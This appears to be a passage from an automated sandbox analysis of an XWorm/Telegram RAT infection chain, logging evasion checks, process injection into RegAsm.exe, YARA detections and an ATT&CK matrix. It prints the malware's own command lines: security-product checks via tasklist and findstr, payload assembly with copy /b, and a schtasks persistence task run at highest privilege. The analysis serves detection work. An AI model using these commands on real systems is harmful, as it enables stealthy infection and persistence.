                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifWindow / User API: threadDelayed 1826Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeWindow / User API: threadDelayed 713Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeWindow / User API: threadDelayed 9107Jump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifAPI coverage: 4.8 %
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrAPI coverage: 4.6 %
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe TID: 6656Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifThread sleep count: Count: 1826 delay: -10Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00EA4005
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00EA494A
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00EA3CE2
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00EAC2FF
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00EACD9F
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EACD14 FindFirstFileW,FindClose,10_2_00EACD14
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00EAF5D8
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00EAF735
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00EAFA36
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00354005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00354005
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0035C2FF
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0035494A
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035CD14 FindFirstFileW,FindClose,18_2_0035CD14
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0035CD9F
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0035F5D8
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0035F735
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0035FA36
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00353CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00353CE2
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E55D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00E55D13
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\438799Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\438799\Jump to behavior
                Source: RegAsm.exe, 00000017.00000002.2975642601.0000000006780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                Source: Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll["
                Source: RegAsm.exe, 00000017.00000002.2972830964.00000000012E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VmCi-
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EB45D5 BlockInput,10_2_00EB45D5
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00E55240
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E75CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00E75CAC
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00E988CD
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00E6A385
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6A354 SetUnhandledExceptionFilter,10_2_00E6A354
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031A354 SetUnhandledExceptionFilter,18_2_0031A354
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0031A385
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifMemory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: 1030000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifMemory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: 1030000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifMemory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: F7D000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E99369 LogonUserW,10_2_00E99369
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00E55240
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA1AC6 SendInput,keybd_event,10_2_00EA1AC6
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA51E2 mouse_event,10_2_00EA51E2
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.batJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity LJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif LJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00E988CD
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00EA4F1C
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028DD000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1753045770.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744374381.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q(
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-^q
                Source: Dump.pif, ImageSyncProX.scrBinary or memory string: Shell_TrayWnd
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6885B cpuid 10_2_00E6885B
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E80030 GetLocalTime,__swprintf,10_2_00E80030
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E80722 GetUserNameW,10_2_00E80722
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E7416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00E7416A
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: RegAsm.exe, 00000017.00000002.2972830964.0000000001321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
                Yara detected XWorm
                Source: Yara matchFile source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Dump.pif PID: 5432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: ImageSyncProX.scrBinary or memory string: WIN_81
                Source: ImageSyncProX.scrBinary or memory string: WIN_XP
                Source: ImageSyncProX.scrBinary or memory string: WIN_XPe
                Source: ImageSyncProX.scrBinary or memory string: WIN_VISTA
                Source: ImageSyncProX.scrBinary or memory string: WIN_7
                Source: ImageSyncProX.scrBinary or memory string: WIN_8
                Source: Dump.pif.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
                Yara detected XWorm
                Source: Yara matchFile source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Dump.pif PID: 5432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EB696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_00EB696E
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EB6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00EB6E32
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0036696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,18_2_0036696E
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00366E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_00366E32

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		2
                Valid Accounts                		111
                Windows Management Instrumentation                		111
                Scripting                		1
                Exploitation for Privilege Escalation                		11
                Disable or Modify Tools                		121
                Input Capture                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		LSASS Memory1
                Account Discovery                		Remote Desktop Protocol121
                Input Capture                		2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job                		2
                Valid Accounts                		2
                Valid Accounts                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Scheduled Task/Job                		21
                Access Token Manipulation                		2
                Software Packing                		NTDS28
                System Information Discovery                		Distributed Component Object ModelInput Capture1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Scheduled Task/Job                		111
                Masquerading                		Cached Domain Credentials141
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture13
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync4
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
